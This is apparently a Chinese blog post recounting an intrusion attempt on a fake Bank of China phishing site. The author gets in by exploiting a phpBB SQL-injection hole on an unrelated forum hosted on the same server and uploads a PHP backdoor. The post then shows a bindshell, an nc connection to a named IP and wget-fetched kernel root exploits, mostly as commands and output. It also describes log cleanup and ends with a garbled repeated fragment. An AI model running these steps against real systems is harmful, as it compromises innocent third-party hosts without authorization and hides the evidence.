虛假中國銀行(www.banochi.net)入侵嘗試實錄

27日晚看到天天網的一片報道：中國銀行網站再次遭遇克隆;假網站遠在北美
本來要整理規劃的，既然出了這個事情，好歹看看吧。廢話不說，開始！
1、收集信息
服務器信息：;
Apache/1.3.33;;;
PHP/4.3.9;
網站主文件：;
http://www.banochi.net/english/index.shtml;
查看虛假網站，基本沒發現什麼可用的東西，估計只有記錄密碼和ip的cgi程序。除了服務器入侵，還可以考慮旁注。
檢索其他站點，分析了幾個php站點的注入，沒太多利用的地方。想起phpbb的洞洞，寫段代碼檢索一下viewtopic.php文件，找到一個phpbb2.0.10入侵點
http://www.bits-clsu.org/forum/viewtopic.php?t=1;
事後才想起可以用旁注工具直接來檢索，反正都一樣。
2、上傳木馬
利用phpbb的洞，漏洞介紹“phpBB遠程任意SQL注入漏洞”，“phpbb〈2.0.11程序的sql注入漏洞分析”上傳php後門。
3、生成bindshell
我還在看文件的時候，Edward就已經做了個bindshell出來，呵呵！基本方法：
上傳bindshell.c
gcc;-o;/tmp/bind;bindshell.c;
/tmp/bind;
nc上去看看，還是在shell下比較方便。
nc;-vv;216.22.48.72;7758;
4、采集系統信息
拿到webshell後就可以獲得一些基本的信息包括passwd、httpd.conf等等，檢索到虛假網站的絕對路徑;/home/banochin/public_html/，在webshell中查看文件創建的時期是服務器時間2004-12-15，在其cgi-;bin目錄下有如下文件
文件;;;;;創建日期;最後修改;大小;;;;;屬性;
[member];;;2005-02-21;21:39:03;2005-02-21;21:39:03;0700;
errlog.dat;2005-02-28;00:32:22;2005-02-28;00:32:22;140.186;KB;0600;
id.dat;;;2005-02-24;10:48:35;2005-02-24;10:48:35;1.727;KB;0600;
index.htm;2004-12-15;03:19:51;2004-12-15;03:19:51;0.697;KB;0644;
pwd.dat;;;2005-02-25;00:36:15;2005-02-25;00:36:15;0.170;KB;0600;
pwdbak.dat;2004-12-15;03:24:17;2004-12-15;03:19:55;0.516;KB;0600;
security.cgi;2004-12-15;03:24:03;2004-12-15;03:20:00;44.363;KB;0700;
visemailer.cgi;2004-12-15;03:24:04;2004-12-15;03:20:02;3.554;KB;0700;
可以看到最後記錄的密碼日期是2月25日，而浏覽目錄後發現還包括了很多其他語言的中國銀行網站內容，但基本都是html文件，想必是從中國銀行直接webdump下來的。
內核信息，因為我們對其目錄沒有寫權限，接著要做的就是提權了。前後大概用了1小時左右，而剩下的提權工作卻花了我1天多的時間，結果還是沒搞定，郁悶！
uname;-r;
2.4.20-021stab022.11.777-enterprise;
5、本地提升權限測試
增加環境變量
export;PATH=/usr/bin:$PATH
否則會出現collect2:;cannot;find;`ld’錯誤！
（1）Linux;Kernel;moxa串行驅動BSS溢出漏洞
grsecurity;2.1.0;release;/;5;Linux;kernel;advisories
URL：
http://www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=7446&keyword=
http://lists.netsys.com/pipermail/full-disclosure/2005-January/030660.html
文件：
http://grsecurity.net/~spender/exploits_and_patches.tgz
測試：
wget;http://grsecurity.net/~spender/exploits_and_patches.tgz;
tar;-zxvf;exploits_and_patches.tgz;
cd;exploits_and_patches;
make;alloc=0x100000;

nasm;-f;elf;-DALLOCATE=32482374;mlock-dos.S;
make:;nasm:;Command;not;found;
make:;***;[;all;];Error;127;
結論：
缺少nasm，即使上傳rpm也不能夠執行安裝！
（2）Linux;Kernel;uselib()特權提升漏洞
Linux;kernel;sys_uselib;local;root;vulnerability
URL：
http://www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=7326&keyword=
http://marc.theaimsgroup.com/?l=bugtraq&m=110513415105841&q=raw
http://marc.theaimsgroup.com/?l=bugtraq&m=110512575901427&w=2
http://isec.pl/vulnerabilities/isec-0021-uselib.txt
文件：
http://marc.theaimsgroup.com/?l=bugtraq&m=110512575901427&q=p3
測試：
gcc;-O2;-fomit-frame-pointer;elflbl_v108.c;-o;elflbl_v108;

elflbl_v108.c:;In;function;`check_vma_flags’:;
elflbl_v108.c:545:;warning:;deprecated;use;of;label;at;end;of;compound;statement;

./elflbl_v108;

child;1;VMAs;0;
[+];moved;stack;bff73000,;task_size=0xc0000000,;map_base=0xbf800000;
[+];vmalloc;area;0xc7c00000;-;0xcf707000;
Wait...;-Segmentation;fault;

gcc;-O2;-fomit-frame-pointer;elflbl_v109.c;-o;elflbl_v109;
./elflbl_v109;

[+];SLAB;cleanup;
[-];FAILED:;get_slab_objs:;/proc/slabinfo;not;readable?;(No;such;file;or;directory);
sh:;line;9:;24080;Killed;;;;;./elflbl_v109;
（3）Linux內核本地整數溢出和內存洩露漏洞
fun;with;linux;kernel
URL：
http://www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=7269&keyword=
http://marc.theaimsgroup.com/?l=full-disclosure&m=110374209001676&w=2
測試：
gcc;-o;vc;vc_resize.c;
./vc_resize;

open:;No;such;device;or;address;

gcc;memory_leak.c;-o;memory_leak;

memory_leak.c:80:2:;warning:;no;newline;at;end;of;file;
（4）Linux;Kernel;do_mremap;VMA本地權限提升漏洞
Linux;kernel;do_mremap;VMA;limit;local;privilege;escalation
URL：
http://www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=6102&keyword=%CC%E1%C9%FD
http://isec.pl/vulnerabilities/isec-0014-mremap-unmap.txt
文件：
http://rhea.oamk.fi/~pyanil00/temp/mremap_pte.c
測試：
gcc;-O3;-static;-fomit-frame-pointer;mremap_pte.c;-o;mremap_pte;
./mremap_pte;

[+];kernel;2.4.20-021stab022.11.777-enterprise;vulnerable:;YES;exploitable;YES;
MMAP;#65530;0x50bfa000;-;0x50bfb000;
[-];Failed;
（5）Linux;Kernel;kmod/ptrace競爭條件權限提升漏洞
linux;kmod/ptrace;bug;-;details
URL：
http://www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=4570&keyword=%CC%E1%C9%FD
http://marc.theaimsgroup.com/?l=bugtraq&m=104811209231385&w=2
文件：
http://august.v-lo.krakow.pl/~anszom/km3.c
測試：
gcc;-o;km3;km3.c;
./km3;?;

Usage:;./km3;[-d];[-b];[-r];[-s];[-c;executable];
-d;;;;;--;use;double-ptrace;method;(to;run;interactive;programs);
-b;;;;;--;start;bindshell;on;port;4112;
-r;;;;;--;support;randomized;pids;
-c;;;;;--;choose;executable;to;start;
-s;;;;;--;single-shot;mode;-;abort;if;unsuccessful;at;the;first;try;

./km3;-s;

Linux;kmod;+;ptrace;local;root;exploit;by;

=〉;Simple;mode,;executing;/usr/bin/id;〉;/dev/tty;
sizeof(shellcode)=95;
=〉;Child;process;started..........;
Failed;
（6）Linux;Kernel;i386;SMP頁錯誤處理器特權提升漏洞
Linux;kernel;i386;SMP;page;fault;handler;privilege;escalation
URL：
http://www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=7338
http://marc.theaimsgroup.com/?l=bugtraq&m=110554694522719&w=2
測試：
gcc;-o;smp;smp.c;
./smp;

[+];in;thread;1;(pid;=;5400);
[+];in;thread;2;(pid;=;5401);
[+];rdtsc;calibration:;53428;
[+];exploiting;race,;wait...;
[-];unable;to;exploit;race;in;30s,;
kernel;patched;or;load;too;high.;
嘗試多個本地提權均未能成功！很郁悶！而在測試過程的時候，虛假網站已經被關閉了，雖然文件還在，但是很明顯官方已經作了努力，並得到了不錯的結果。
6、其他
找了幾個linux的鍵盤記錄，都要root權限。而服務器遠程連接使用的ssh的，使用sniffer也估計沒戲，所以暫時也沒什麼思路，清理exp、日志文件。
以上是我的一些測試的結果，結果也沒有拿到root，不過我整理了一下相關的漏洞，希望對大家以後有些幫助。在站長群裡發布了相關的結果，也沒有人回話，不知道大家是太忙。。。
文中並未特殊處理漏洞及結果，有興趣的可以直接利用，不過沒必要為難其他站點，我想大家明白我的意思！
折騰了這麼久，還有好多工作的事情要做！希望不會被老板說，呵呵！
最後感謝Edward、老黑及幾位公司的高人！bindshell;on;port;4112;
-r;;;;;--;support;randomized;pids;
-c;;;;;--;choose;executable;to;start;
-s;;;;;--;single-shot;mode;-;abort;if;unsuccessful;at;the;first;try;

./km3;-s;

Linux;kmod;+;ptrace;local;root;exploit;by;

=〉;Simple;mode,;executi